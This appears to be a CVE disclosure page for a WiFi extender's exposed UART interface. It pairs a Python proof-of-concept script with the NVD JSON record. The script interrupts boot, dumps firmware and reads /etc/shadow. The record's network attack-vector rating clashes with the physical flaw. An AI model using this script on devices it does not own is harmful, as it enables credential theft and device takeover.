CVE-2026-30704

# CVE-2026-30704 UART Access PoC # Hardware Requirements: USB-to-TTL adapter (FTDI/CH340), jumper wires # Connection: TX->RX, RX->TX, GND->GND import serial import time # UART Configuration for WDR201A UART_CONFIG = { 'port': '/dev/ttyUSB0', # Adjust based on your system 'baudrate': 115200, 'bytesize': serial.EIGHTBITS, 'parity': serial.PARITY_NONE, 'stopbits': serial.STOPBITS_ONE, 'timeout': 1 } def connect_uart(): """Establish UART connection to WDR201A device""" try: ser = serial.Serial(**UART_CONFIG) print(f"[*] Connected to {UART_CONFIG['port']}") print(f"[*] Baudrate: {UART_CONFIG['baudrate']}") return ser except serial.SerialException as e: print(f"[!] Connection failed: {e}") return None def interact_with_uart(ser): """Interact with UART shell""" print("[*] Waiting for boot messages...") time.sleep(3) # Read boot output while ser.in_waiting: char = ser.read(1).decode('utf-8', errors='ignore') print(char, end='') # Send break to enter U-Boot (press Ctrl+C during boot) print("\n[*] Attempting to interrupt boot process...") ser.send_break() time.sleep(0.5) # Clear buffer while ser.in_waiting: ser.read(ser.in_waiting) # Try common U-Boot commands commands = ['help', 'printenv', 'setenv', 'boot'] for cmd in commands: ser.write(f"{cmd}\n".encode()) time.sleep(0.5) while ser.in_waiting: char = ser.read(1).decode('utf-8', errors='ignore') print(char, end='') def extract_firmware(ser): """Attempt to extract firmware via UART""" # Common commands to extract firmware cmds = [ 'cat /proc/mtd', 'cat /dev/mtdblock0 > /tmp/firmware.bin', 'cat /etc/config/wireless', 'cat /etc/shadow', 'strings /dev/mtdblock0' ] for cmd in cmds: print(f"\n[*] Executing: {cmd}") ser.write(f"{cmd}\n".encode()) time.sleep(2) while ser.in_waiting: char = ser.read(1).decode('utf-8', errors='ignore') print(char, end='') if __name__ == '__main__': ser = connect_uart() if ser: interact_with_uart(ser) # Uncomment to attempt firmware extraction # extract_firmware(ser) ser.close()

{"cve": {"id": "CVE-2026-30704", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:28.077", "lastModified": "2026-03-19T15:16:26.580", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02) exposes an unprotected UART interface through accessible hardware pads on the PCB"}, {"lang": "es", "value": "El extensor WiFi WDR201A (HW V2.1, FW LFMZX28040922V1.02) expone una interfaz UART desprotegida a través de pads de hardware accesibles en la PCB."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-912"}]}], "references": [{"url": "https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "[email protected]"}, {"url": "https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China", "source": "[email protected]"}]}}